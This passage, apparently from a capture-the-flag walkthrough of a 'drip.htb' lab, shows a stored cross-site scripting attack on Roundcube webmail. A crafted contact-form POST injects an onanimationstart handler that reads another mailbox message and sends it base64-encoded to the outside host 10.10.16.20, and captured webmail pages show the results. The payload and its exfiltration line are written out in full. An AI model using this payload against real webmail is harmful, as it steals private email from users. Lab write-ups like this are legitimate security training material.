        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"mail","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10607,"cookie_domain":"","cookie_path":"/","cookie_secure":false,"dark_mode_support":true,"skin":"elastic","extwin":1,"blankpage":"skins/elastic/watermark.html","refresh_interval":10,"session_lifetime":600,"action":"show","comm_path":"/?_task=mail","user_id":"twZLggeBqoXLUfNK","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","browser_capabilities":{"pdf":"1","flash":"0","tiff":"0","webp":"1","pgpmime":"0"},"uid":"3","safemode":true,"message_context":null,"message_flags":["seen"],"sender":"kujen \[email protected]\u003E","mailbox":"INBOX","username":"bcase","permaurl":"/?_task=mail&_action=show&_uid=3&_mbox=INBOX","has_writeable_addressbook":true,"delimiter":".","mimetypes":["text/plain","text/html","image/jpeg","image/gif","image/png","image/bmp","image/tiff","image/webp","application/x-javascript","application/pdf","message/rfc822"],"read_when_deleted":true,"display_next":true,"optional_format":"text","mailboxes":{"INBOX":{"id":"INBOX","name":"Inbox","virtual":false,"class":"inbox"}},"mailboxes_list":["INBOX"],"request_token":"QpdT8JMZkK0l5s23G8KkDNgOQl7p9Cca"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","checkingmail":"Checking for new messages...","deletemessage":"Delete message","movemessagetotrash":"Move message to trash","movingmessage":"Moving message(s)...","deletingmessage":"Deleting message(s)...","markingmessage":"Marking message(s)...","replyall":"Reply all","replylist":"Reply list","bounce":"Resend","bouncemsg":"Resend (bounce)","sendingmessage":"Sending message...","back":"Back","errortitle":"An error occurred!","options":"Options","plaintoggle":"Plain text","htmltoggle":"HTML","previous":"Previous","next":"Next","select":"Select","browse":"Browse","choosefile":"Choose file...","choosefiles":"Choose files...","purgefolderconfirm":"Do you really want to delete all messages in this folder?","deletemessagesconfirm":"Do you really want to delete selected message(s)?","viewsource":"Show source","details":"Details","summary":"Summary","arialabelmessageheaders":"Message headers"});
rcmail.gui_container("toolbar","mailtoolbar");
rcmail.gui_container("forwardmenu","forward-menu");
rcmail.gui_container("replyallmenu","replyall-menu");
rcmail.gui_container("messagemenu","message-menu");
rcmail.gui_container("markmenu","markmessage-menu");
rcmail.gui_container("headerlinks","header-links");
rcmail.gui_container("attachmentmenu","attachmentmenu");
rcmail.gui_container("mailtomenu","mailto-menu");rcmail.register_button('compose', 'rcmbtn100', 'link', '', '', '');
rcmail.register_button('reply', 'rcmbtn101', 'link', 'reply', '', '');
rcmail.register_button('reply-all', 'rcmbtn102', 'link', 'reply-all', '', '');
rcmail.register_button('forward', 'rcmbtn103', 'link', 'forward', '', '');
rcmail.register_button('delete', 'rcmbtn104', 'link', 'delete', '', '');
rcmail.register_button('print', 'rcmbtn105', 'link', 'print', '', '');
rcmail.register_button('previousmessage', 'rcmbtn106', 'link', 'prev', '', '');
rcmail.register_button('nextmessage', 'rcmbtn107', 'link', 'next', '', '');
rcmail.register_button('forward-inline', 'rcmbtn108', 'link', 'forward inline active', '', '');
rcmail.register_button('forward-attachment', 'rcmbtn109', 'link', 'forward attachment active', '', '');
rcmail.register_button('bounce', 'rcmbtn110', 'link', 'forward bounce active', '', '');
rcmail.register_button('reply-all', 'rcmbtn111', 'link', 'reply all active', '', '');
rcmail.register_button('reply-list', 'rcmbtn112', 'link', 'reply list active', '', '');
rcmail.register_button('print', 'rcmbtn113', 'link', 'print active', '', '');
rcmail.register_button('download', 'rcmbtn114', 'link', 'download active', '', '');
rcmail.register_button('edit', 'rcmbtn115', 'link', 'edit asnew active', '', '');
rcmail.register_button('viewsource', 'rcmbtn116', 'link', 'source active', '', '');
rcmail.register_button('move', 'rcmbtn117', 'link', 'move active', '', '');
rcmail.register_button('copy', 'rcmbtn118', 'link', 'copy active', '', '');
rcmail.register_button('open', 'rcmbtn119', 'link', 'extwin active', '', '');
rcmail.register_button('mark', 'rcmbtn120', 'link', 'read active', '', '');
rcmail.register_button('mark', 'rcmbtn121', 'link', 'unread active', '', '');
rcmail.register_button('mark', 'rcmbtn122', 'link', 'flag active', '', '');
rcmail.register_button('mark', 'rcmbtn123', 'link', 'unflag active', '', '');
rcmail.register_button('change-format', 'rcmbtn124', 'link', '', '', '');
rcmail.gui_object('remoteobjectsmsg', 'remote-objects-message');
rcmail.gui_object('messagebody', 'messagebody');
rcmail.register_button('open-attachment', 'attachmenuopen', 'link', 'extwin active', '', '');
rcmail.register_button('download-attachment', 'attachmenudownload', 'link', 'download active', '', '');
rcmail.gui_object('message', 'messagestack');
</script>

<script src="plugins/jqueryui/js/jquery-ui.min.js?s=1716107237"></script>
</head>
<body class="task-mail action-show">
	
		<div id="layout">
	





<h1 class="voice">Message preview</h1>

<div id="layout-content" class="selected">
	
		<h2 id="aria-label-toolbar" class="voice">Application toolbar</h2>
		<div class="header" role="toolbar" aria-labelledby="aria-label-toolbar">
			<a class="button icon back-list-button" href="#back"><span class="inner">Back</span></a>
			<span class="header-title"></span>
			
<div id="mailtoolbar" class="toolbar menu" role="toolbar">
	<a class="compose hidden" title="Create a new message" id="rcmbtn100" role="button" href="/?_task=mail&amp;_action=compose" onclick="return rcmail.command('compose','',this,event)"><span class="inner">Compose</span></a>
	<a class="reply disabled" title="Reply to sender" data-content-button="true" id="rcmbtn101" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply','',this,event)"><span class="inner">Reply</span></a>
	<span class="dropbutton">
		<a class="reply-all disabled" title="Reply to list or to sender and all recipients" id="rcmbtn102" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-all','',this,event)"><span class="inner">Reply all</span></a>
		<a href="#reply-all" id="replyallmenulink" class="dropdown" data-popup="replyall-menu" tabindex="0">
			<span class="inner">Reply-all options</span>
		</a>
	</span>
	<span class="dropbutton">
		<a class="forward disabled" title="Forward the message" id="rcmbtn103" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward','',this,event)"><span class="inner">Forward</span></a>
		<a href="#forward" id="forwardmenulink" class="dropdown" data-popup="forward-menu" tabindex="0">
			<span class="inner">Forwarding options</span>
		</a>
	</span>
	<span class="spacer"></span>
	<a class="delete disabled" title="Delete message" id="rcmbtn104" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('delete','',this,event)"><span class="inner">Delete</span></a>
	
		<a class="print disabled" title="Print this message" data-hidden="small" id="rcmbtn105" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('print','',this,event)"><span class="inner">Print</span></a>
	
	
	<a id="markmessagemenulink" class="markmessage" title="Mark messages" data-popup="markmessage-menu" role="button" href="#"><span class="inner">Mark</span></a>
	<a id="messagemenulink" class="more" title="More actions..." data-popup="message-menu" role="button" href="#"><span class="inner">More</span></a>
	
		<span class="spacer"></span>
		<a class="prev disabled" title="Show previous message" data-hidden="small" id="rcmbtn106" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('previousmessage','',this,event)"><span class="inner">Previous</span></a>
		<a class="next disabled" title="Show next message" data-hidden="small" id="rcmbtn107" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('nextmessage','',this,event)"><span class="inner">Next</span></a>
	
</div>

<div id="forward-menu" class="popupmenu">
	<h3 id="aria-label-forward-menu" class="voice">Forwarding options</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-forward-menu">
		<li role="menuitem"><a class="forward inline disabled" id="rcmbtn108" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward-inline','sub',this,event)">Forward inline</a></li>
		<li role="menuitem"><a class="forward attachment disabled" id="rcmbtn109" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward-attachment','sub',this,event)">Forward as attachment</a></li>
		<li role="menuitem"><a class="forward bounce disabled" id="rcmbtn110" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('bounce','',this,event)">Resend (bounce)</a></li>
		
	</ul>
</div>

<div id="replyall-menu" class="popupmenu">
	<h3 id="aria-label-replyall-menu" class="voice">Reply-all options</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-replyall-menu">
		<li role="menuitem"><a class="reply all disabled" id="rcmbtn111" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-all','sub',this,event)">Reply all</a></li>
		<li role="menuitem"><a class="reply list disabled" id="rcmbtn112" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-list','sub',this,event)">Reply list</a></li>
		
	</ul>
</div>

<div id="message-menu" class="popupmenu">
	<h3 id="aria-label-message-menu" class="voice">More message actions</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-message-menu">
		<li role="menuitem"><a class="print disabled" data-hidden="small" id="rcmbtn113" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('print','',this,event)">Print this message</a></li>
		
		<li role="menuitem"><a class="download disabled" id="rcmbtn114" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('download','',this,event)">Export</a></li>
		<li role="menuitem"><a class="edit asnew disabled" id="rcmbtn115" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('edit','new',this,event)">Edit as new</a></li>
		<li role="menuitem"><a class="source disabled" id="rcmbtn116" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('viewsource','',this,event)">Show source</a></li>
		<li role="menuitem"><a class="move disabled" aria-haspopup="true" id="rcmbtn117" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('move','',this,event)"><span class="folder-selector-link">Move to...</span></a></li>
		<li role="menuitem"><a class="copy disabled" aria-haspopup="true" id="rcmbtn118" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('copy','',this,event)"><span class="folder-selector-link">Copy to...</span></a></li>
		<li role="menuitem"><a target="_blank" class="extwin disabled" data-hidden="small" id="rcmbtn119" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('open','',this,event)">Open in new window</a></li>
		
	</ul>
</div>

<div id="markmessage-menu" class="popupmenu">
	<h3 id="aria-label-markmessage-menu" class="voice">Mark selected messages as...</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-markmessage-menu">
		<li role="menuitem"><a class="read disabled" id="rcmbtn120" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','read',this,event)">As read</a></li>
		<li role="menuitem"><a class="unread disabled" id="rcmbtn121" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','unread',this,event)">As unread</a></li>
		<li role="menuitem"><a class="flag disabled" id="rcmbtn122" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','flagged',this,event)">As flagged</a></li>
		<li role="menuitem"><a class="unflag disabled" id="rcmbtn123" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','unflagged',this,event)">As unflagged</a></li>
		
		
	</ul>
</div>



		</div>
	
	<div class="content frame-content" role="main">
		<div id="message-header">
			<h2 class="subject">
				<span class="voice">Subject: </span>
				Customer Information Request
				
			</h2>
			<div class="header">
				<img src="/?_task=addressbook&amp;_action=photo&amp;_email=kujen%40drip.htb&amp;_error=1&amp;_bgcolor=transparent" alt="Contact photo" class="contactphoto" onerror="this.onerror = null; this.src = 'skins/elastic/images/contactpic.svg';">
				<div class="header-content">
					<div class="header-summary"><span>From <span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','kujen &lt;[email protected]&gt;',this)" title="[email protected]">kujen</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','kujen &lt;[email protected]&gt;',this)"></a></span> on <span class="text-nowrap">2025-02-13 12:30</span></span></div>
					<table class="header-headers"><tbody><tr><td class="header-title">From</td><td class="header from"><span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','kujen &lt;[email protected]&gt;',this)" title="[email protected]">kujen</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','kujen &lt;[email protected]&gt;',this)"></a></span></td></tr><tr><td class="header-title">To</td><td class="header to"><span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','[email protected]',this)" title="[email protected]">[email protected]</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','[email protected]',this)"></a></span></td></tr><tr><td class="header-title">Reply-To</td><td class="header replyto"><span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','[email protected]',this)" title="[email protected]">[email protected]</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','[email protected]',this)"></a></span></td></tr><tr><td class="header-title">Date</td><td class="header date">Today 12:30</td></tr></tbody></table>
					<div class="header-links">
						
						
						<a href="#headers" class="headers-summary" onclick="return UI.headers_show(true)"></a>
						<a href="#all-headers" class="headers-all" onclick="return UI.headers_dialog()">Headers</a>
						
						
							<a class="plain" title="Display in plain text format" id="rcmbtn124" role="button" href="#" onclick="return rcmail.command('change-format','text',this,event)"><span class="inner">Plain text</span></a>
						
						
					</div>
				</div>
			</div>
		</div>
		<div id="message-content">
			<div class="leftcol" role="region" aria-labelledby="aria-label-messageattachments">
				<h2 id="aria-label-messageattachments" class="voice">Attachments</h2>
				
			</div>
			<div class="rightcol" role="region" aria-labelledby="aria-label-messagebody">
				<h2 id="aria-label-messagebody" class="voice">Message Body</h2>
				<div id="message-objects">
<div id="remote-objects-message" class="notice" style="display: none"><span>To protect your privacy remote resources have been blocked.</span>&nbsp;<span class="boxbuttons"><a href="#loadremote" onclick="rcmail.command('load-remote')">Allow</a></span></div>
</div>
				<div id="messagebody"><div class="message-htmlpart" id="message-htmlpart1" style="background-color: foo"><!-- html ignored --><!-- head ignored --><!-- meta ignored --><div class="rcmBody" title=" name="bar style=animation-name:progress-bar-stripes onanimationstart=fetch(&#039;/?_task=mail&amp;_action=show&amp;_uid=3&amp;_mbox=INBOX&amp;_extwin=1&#039;).then(r=&gt;r.text()).then(t=&gt;fetch(`http://10.10.16.20/c=${btoa(t)}`))  foo=bar">Foo</div>









Confidentiality Notice: This electronic communication may contain confidential or privileged information. Any unauthorized review, use, disclosure, copying, distribution, or taking of any part of this email is strictly prohibited.
If you suspect that you've received a &quot;phishing&quot; e-mail, please forward the entire email to our security engineer at [email protected]</div></div>
			</div>
		</div>
	</div>
</div>

<!-- popup menus -->
<div id="attachmentmenu" class="popupmenu">
	<h3 id="aria-label-attachmentmenu" class="voice">Attachment options</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-attachmentmenu">
		<li role="menuitem"><a id="attachmenuopen" class="extwin disabled" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('open-attachment','',this,event)">Open</a></li>
		<li role="menuitem"><a id="attachmenudownload" class="download disabled" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('download-attachment','',this,event)">Download</a></li>
		
	</ul>
</div>

<div id="mailto-menu" class="popupmenu">
	<h3 id="aria-label-mailtomenu" class="voice">Email address options</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-mailtomenu">
		<li role="menuitem"><a class="addressbook" id="rcmbtn125" role="button" tabindex="-1" aria-disabled="true" href="#">Add to address book</a></li>
		<li role="menuitem"><a class="compose" id="rcmbtn126" role="button" tabindex="-1" aria-disabled="true" href="#">Compose mail to</a></li>
		
	</ul>
</div>


</div>



<div id="messagestack"></div>
<script>
$(function() {
rcmail.init();
});
</script>



<script src="skins/elastic/deps/bootstrap.bundle.min.js?s=1716107245"></script>
<script src="skins/elastic/ui.min.js?s=1716107237"></script>

</body>
</html>

Now we do all of it again but with uid=2:

POST /contact HTTP/1.1
Host: drip.htb
Content-Length: 440
Cache-Control: max-age=0
Origin: http://drip.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: en-US,en;q=0.6
Referer: http://drip.htb/index
Accept-Encoding: gzip, deflate, br
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiN2RlMTc2YWJmYzA5NDc3NDZlYjExOGYzYWEyODJkYWVmZTE3YWM1NCJ9.Z65HuQ.PAgXqD2w-R0gz0_G3BuKM-Lon84
Connection: keep-alive

name=kujen&email=kujen&message=%3Cbody%20title%3D%22bgcolor%3Dfoo%22%20name%3D%22bar%20style%3Danimation-name%3Aprogress-bar-stripes%20onanimationstart%3Dfetch%28%27%2F%3F_task%3Dmail%26_action%3Dshow%26_uid%3D2%26_mbox%3DINBOX%26_extwin%3D1%27%29.then%28r%3D%3Er.text%28%29%29.then%28t%3D%3Efetch%28%60http%3A%2F%2F10.10.16.20%2Fc%3D%24%7Bbtoa%28t%29%7D%60%29%29%20%20foo%3Dbar%22%3EFoo%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb

We receive another b64 value that we decode into another page:

<!DOCTYPE html>

<html lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>DripMail Webmail :: Analytics Dashboard</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no, maximum-scale=1.0"><meta name="theme-color" content="#f4f4f4"><meta name="msapplication-navbutton-color" content="#f4f4f4">
	<link rel="shortcut icon" href="skins/elastic/images/favicon.ico?s=1716107237">
	<link rel="stylesheet" href="skins/elastic/deps/bootstrap.min.css?s=1716107245">
	
		<link rel="stylesheet" href="skins/elastic/styles/styles.min.css?s=1716107237">
		
	
	
		<script>
		try {
			if (document.cookie.indexOf('colorMode=dark') > -1
				|| (document.cookie.indexOf('colorMode=light') === -1 && window.matchMedia('(prefers-color-scheme: dark)').matches)
			) {
				document.documentElement.className += ' dark-mode';
			}
		} catch (e) { }
		</script>
	
<link rel="stylesheet" type="text/css" href="plugins/jqueryui/themes/elastic/jquery-ui.min.css?s=1716107237"><script src="program/js/jquery.min.js?s=1716107242"></script><script src="program/js/common.min.js?s=1716107237"></script><script src="program/js/app.min.js?s=1716107237"></script><script>
/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"mail","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10607,"cookie_domain":"","cookie_path":"/","cookie_secure":false,"dark_mode_support":true,"skin":"elastic","extwin":1,"blankpage":"skins/elastic/watermark.html","refresh_interval":10,"session_lifetime":600,"action":"show","comm_path":"/?_task=mail","user_id":"twZLggeBqoXLUfNK","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","browser_capabilities":{"pdf":"1","flash":"0","tiff":"0","webp":"1","pgpmime":"0"},"uid":"2","safemode":false,"message_context":null,"message_flags":["seen"],"sender":"ebelford \[email protected]\u003E","mailbox":"INBOX","username":"bcase","permaurl":"/?_task=mail&_action=show&_uid=2&_mbox=INBOX","has_writeable_addressbook":true,"delimiter":".","mimetypes":["text/plain","text/html","image/jpeg","image/gif","image/png","image/bmp","image/tiff","image/webp","application/x-javascript","application/pdf","message/rfc822"],"read_when_deleted":true,"display_next":true,"mailboxes":{"INBOX":{"id":"INBOX","name":"Inbox","virtual":false,"class":"inbox"}},"mailboxes_list":["INBOX"],"request_token":"QpdT8JMZkK0l5s23G8KkDNgOQl7p9Cca"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","checkingmail":"Checking for new messages...","deletemessage":"Delete message","movemessagetotrash":"Move message to trash","movingmessage":"Moving message(s)...","deletingmessage":"Deleting message(s)...","markingmessage":"Marking message(s)...","replyall":"Reply all","replylist":"Reply list","bounce":"Resend","bouncemsg":"Resend (bounce)","sendingmessage":"Sending message...","back":"Back","errortitle":"An error occurred!","options":"Options","plaintoggle":"Plain text","htmltoggle":"HTML","previous":"Previous","next":"Next","select":"Select","browse":"Browse","choosefile":"Choose file...","choosefiles":"Choose files...","purgefolderconfirm":"Do you really want to delete all messages in this folder?","deletemessagesconfirm":"Do you really want to delete selected message(s)?","viewsource":"Show source","details":"Details","summary":"Summary","arialabelmessageheaders":"Message headers"});
rcmail.gui_container("toolbar","mailtoolbar");
rcmail.gui_container("forwardmenu","forward-menu");
rcmail.gui_container("replyallmenu","replyall-menu");
rcmail.gui_container("messagemenu","message-menu");
rcmail.gui_container("markmenu","markmessage-menu");
rcmail.gui_container("headerlinks","header-links");
rcmail.gui_container("attachmentmenu","attachmentmenu");
rcmail.gui_container("mailtomenu","mailto-menu");rcmail.register_button('compose', 'rcmbtn100', 'link', '', '', '');
rcmail.register_button('reply', 'rcmbtn101', 'link', 'reply', '', '');
rcmail.register_button('reply-all', 'rcmbtn102', 'link', 'reply-all', '', '');
rcmail.register_button('forward', 'rcmbtn103', 'link', 'forward', '', '');
rcmail.register_button('delete', 'rcmbtn104', 'link', 'delete', '', '');
rcmail.register_button('print', 'rcmbtn105', 'link', 'print', '', '');
rcmail.register_button('previousmessage', 'rcmbtn106', 'link', 'prev', '', '');
rcmail.register_button('nextmessage', 'rcmbtn107', 'link', 'next', '', '');
rcmail.register_button('forward-inline', 'rcmbtn108', 'link', 'forward inline active', '', '');
rcmail.register_button('forward-attachment', 'rcmbtn109', 'link', 'forward attachment active', '', '');
rcmail.register_button('bounce', 'rcmbtn110', 'link', 'forward bounce active', '', '');
rcmail.register_button('reply-all', 'rcmbtn111', 'link', 'reply all active', '', '');
rcmail.register_button('reply-list', 'rcmbtn112', 'link', 'reply list active', '', '');
rcmail.register_button('print', 'rcmbtn113', 'link', 'print active', '', '');
rcmail.register_button('download', 'rcmbtn114', 'link', 'download active', '', '');
rcmail.register_button('edit', 'rcmbtn115', 'link', 'edit asnew active', '', '');
rcmail.register_button('viewsource', 'rcmbtn116', 'link', 'source active', '', '');
rcmail.register_button('move', 'rcmbtn117', 'link', 'move active', '', '');
rcmail.register_button('copy', 'rcmbtn118', 'link', 'copy active', '', '');
rcmail.register_button('open', 'rcmbtn119', 'link', 'extwin active', '', '');
rcmail.register_button('mark', 'rcmbtn120', 'link', 'read active', '', '');
rcmail.register_button('mark', 'rcmbtn121', 'link', 'unread active', '', '');
rcmail.register_button('mark', 'rcmbtn122', 'link', 'flag active', '', '');
rcmail.register_button('mark', 'rcmbtn123', 'link', 'unflag active', '', '');
rcmail.gui_object('remoteobjectsmsg', 'remote-objects-message');
rcmail.gui_object('messagebody', 'messagebody');
rcmail.register_button('open-attachment', 'attachmenuopen', 'link', 'extwin active', '', '');
rcmail.register_button('download-attachment', 'attachmenudownload', 'link', 'download active', '', '');
rcmail.gui_object('message', 'messagestack');
</script>

<script src="plugins/jqueryui/js/jquery-ui.min.js?s=1716107237"></script>
</head>
<body class="task-mail action-show">
	
		<div id="layout">
	





<h1 class="voice">Message preview</h1>

<div id="layout-content" class="selected">
	
		<h2 id="aria-label-toolbar" class="voice">Application toolbar</h2>
		<div class="header" role="toolbar" aria-labelledby="aria-label-toolbar">
			<a class="button icon back-list-button" href="#back"><span class="inner">Back</span></a>
			<span class="header-title"></span>
			
<div id="mailtoolbar" class="toolbar menu" role="toolbar">
	<a class="compose hidden" title="Create a new message" id="rcmbtn100" role="button" href="/?_task=mail&amp;_action=compose" onclick="return rcmail.command('compose','',this,event)"><span class="inner">Compose</span></a>
	<a class="reply disabled" title="Reply to sender" data-content-button="true" id="rcmbtn101" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply','',this,event)"><span class="inner">Reply</span></a>
	<span class="dropbutton">
		<a class="reply-all disabled" title="Reply to list or to sender and all recipients" id="rcmbtn102" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-all','',this,event)"><span class="inner">Reply all</span></a>
		<a href="#reply-all" id="replyallmenulink" class="dropdown" data-popup="replyall-menu" tabindex="0">
			<span class="inner">Reply-all options</span>
		</a>
	</span>
	<span class="dropbutton">
		<a class="forward disabled" title="Forward the message" id="rcmbtn103" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward','',this,event)"><span class="inner">Forward</span></a>
		<a href="#forward" id="forwardmenulink" class="dropdown" data-popup="forward-menu" tabindex="0">
			<span class="inner">Forwarding options</span>
		</a>
	</span>
	<span class="spacer"></span>
	<a class="delete disabled" title="Delete message" id="rcmbtn104" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('delete','',this,event)"><span class="inner">Delete</span></a>
	
		<a class="print disabled" title="Print this message" data-hidden="small" id="rcmbtn105" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('print','',this,event)"><span class="inner">Print</span></a>
	
	
	<a id="markmessagemenulink" class="markmessage" title="Mark messages" data-popup="markmessage-menu" role="button" href="#"><span class="inner">Mark</span></a>
	<a id="messagemenulink" class="more" title="More actions..." data-popup="message-menu" role="button" href="#"><span class="inner">More</span></a>
	
		<span class="spacer"></span>
		<a class="prev disabled" title="Show previous message" data-hidden="small" id="rcmbtn106" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('previousmessage','',this,event)"><span class="inner">Previous</span></a>
		<a class="next disabled" title="Show next message" data-hidden="small" id="rcmbtn107" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('nextmessage','',this,event)"><span class="inner">Next</span></a>
	
</div>

<div id="forward-menu" class="popupmenu">
	<h3 id="aria-label-forward-menu" class="voice">Forwarding options</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-forward-menu">
		<li role="menuitem"><a class="forward inline disabled" id="rcmbtn108" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward-inline','sub',this,event)">Forward inline</a></li>
		<li role="menuitem"><a class="forward attachment disabled" id="rcmbtn109" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward-attachment','sub',this,event)">Forward as attachment</a></li>
		<li role="menuitem"><a class="forward bounce disabled" id="rcmbtn110" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('bounce','',this,event)">Resend (bounce)</a></li>
		
	</ul>
</div>

<div id="replyall-menu" class="popupmenu">
	<h3 id="aria-label-replyall-menu" class="voice">Reply-all options</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-replyall-menu">
		<li role="menuitem"><a class="reply all disabled" id="rcmbtn111" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-all','sub',this,event)">Reply all</a></li>
		<li role="menuitem"><a class="reply list disabled" id="rcmbtn112" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-list','sub',this,event)">Reply list</a></li>
		
	</ul>
</div>

<div id="message-menu" class="popupmenu">
	<h3 id="aria-label-message-menu" class="voice">More message actions</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-message-menu">
		<li role="menuitem"><a class="print disabled" data-hidden="small" id="rcmbtn113" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('print','',this,event)">Print this message</a></li>
		
		<li role="menuitem"><a class="download disabled" id="rcmbtn114" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('download','',this,event)">Export</a></li>
		<li role="menuitem"><a class="edit asnew disabled" id="rcmbtn115" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('edit','new',this,event)">Edit as new</a></li>
		<li role="menuitem"><a class="source disabled" id="rcmbtn116" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('viewsource','',this,event)">Show source</a></li>
		<li role="menuitem"><a class="move disabled" aria-haspopup="true" id="rcmbtn117" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('move','',this,event)"><span class="folder-selector-link">Move to...</span></a></li>
		<li role="menuitem"><a class="copy disabled" aria-haspopup="true" id="rcmbtn118" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('copy','',this,event)"><span class="folder-selector-link">Copy to...</span></a></li>
		<li role="menuitem"><a target="_blank" class="extwin disabled" data-hidden="small" id="rcmbtn119" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('open','',this,event)">Open in new window</a></li>
		
	</ul>
</div>

